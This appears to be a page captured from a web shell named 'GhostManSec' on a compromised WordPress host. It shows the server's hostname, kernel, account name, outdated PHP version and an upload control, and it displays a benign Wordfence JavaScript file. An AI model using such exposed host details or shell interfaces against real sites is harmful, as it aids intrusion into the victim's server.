GhostManSec
Server: Apache
System: Linux webm002.cluster121.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
User: urgencetin (90929)
PHP: 5.4.45
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/urgencetin/www/wp-content/plugins/wordfence/js/wfdashboard.1701191857.js
if (!window['WFDash']) {
	window['WFDash'] = {
		updateNotificationCount: function(count) {
			(function($) {
				$('.wf-notification-count-value').html(count);
				if (count == 0) {
					$('.wf-notification-count-container').addClass('wf-hidden');
				}
				else {
					$('.wf-notification-count-container').removeClass('wf-hidden');
				}
			})(jQuery);
		}
	}
}